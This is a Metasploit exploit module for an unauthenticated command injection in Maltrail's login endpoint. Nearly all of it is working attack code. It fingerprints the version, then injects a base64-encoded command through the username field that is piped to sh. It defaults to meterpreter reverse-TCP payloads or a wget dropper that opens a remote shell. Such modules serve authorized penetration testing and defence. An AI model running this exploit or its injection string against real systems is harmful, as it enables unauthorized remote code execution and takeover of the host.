Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
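##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options.
  #
  # @param info [Hash] module info supplied by the framework and merged via update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Maltrail Unauthenticated Command Injection',
        'Description' => %q{
          Maltrail is a malicious traffic detection system, utilizing publicly
          available blacklists containing malicious and/or generally suspicious trails.
          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
          The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains
          a command injection vulnerability in the `params.get("username")` parameter.
          An attacker can exploit this vulnerability by injecting arbitrary OS commands
          into the username parameter. The injected commands will be executed with the
          privileges of the running process.
          This vulnerability can be exploited remotely
          without authentication.

          Successfully tested against Maltrail versions 0.52 and 0.53.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ege BALCI <egebalci[at]pm.me>', # msf module
          'Valentin Lobstein', # Add CVE reference + rewrite
          'Chris Wild', # original PoC, analysis
        ],
        'References' => [
          ['EDB', '51676'],
          ['CVE', '2025-34073'],
          ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
          ['URL', 'https://github.com/stamparm/maltrail/issues/19146']
        ],
        'Platform' => %w[unix linux],
        'Privileged' => false,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :wget,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DisclosureDate' => '2023-07-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # Every run sends an HTTP POST to the login endpoint carrying the command,
          # which is likely to show up in the target's web logs; the dropper target
          # additionally stages a binary on the target's filesystem.
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8338),
        OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])
      ]
    )
  end

  # Fingerprint the Maltrail web UI by reading the "(v<b>X.Y</b>)" banner from
  # the index page.
  #
  # @return [Msf::Exploit::CheckCode] Appears for versions below 0.54, Safe for
  #   newer ones, Unknown when no response, a non-200 status, or no version
  #   banner is seen.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    )
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    banner = res.body.to_s.match(%r{\(v<b>([0-9.]+)</b>\)})
    # Without a banner there is no version to compare; comparing nil would raise
    # rather than produce a check result.
    return CheckCode::Unknown("#{peer} - Could not find a Maltrail version banner in the response") if banner.nil?

    version = Rex::Version.new(banner[1])
    # NOTE(review): the description says "<= 0.54" while this treats only
    # versions strictly below 0.54 as vulnerable - confirm which boundary is correct.
    return CheckCode::Appears("Version Detected: #{version}") if version < Rex::Version.new('0.54')

    CheckCode::Safe("Version Detected: #{version}")
  end

  # Send one command to the target through the username parameter of the login
  # endpoint. The command is base64-encoded so it passes through unchanged and is
  # decoded by the target before execution.
  #
  # @param cmd [String] the command to run
  # @param _opts [Hash] unused; present for CmdStager compatibility
  # @return [Rex::Proto::Http::Response, nil] the raw response, or nil on no reply
  def execute_command(cmd, _opts = {})
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'login'),
      'method' => 'POST',
      # The body is pre-built below; let it through without URI encoding.
      'uri_encode_mode' => 'none',
      # 'ctype' is a send_request_cgi option, not a header name.
      'ctype' => 'application/x-www-form-urlencoded',
      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"
    )
  end

  # Run the selected target: the Unix target sends the encoded payload directly,
  # the Linux target goes through the CmdStager.
  def exploit
    print_status("Executing #{target.name}...")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end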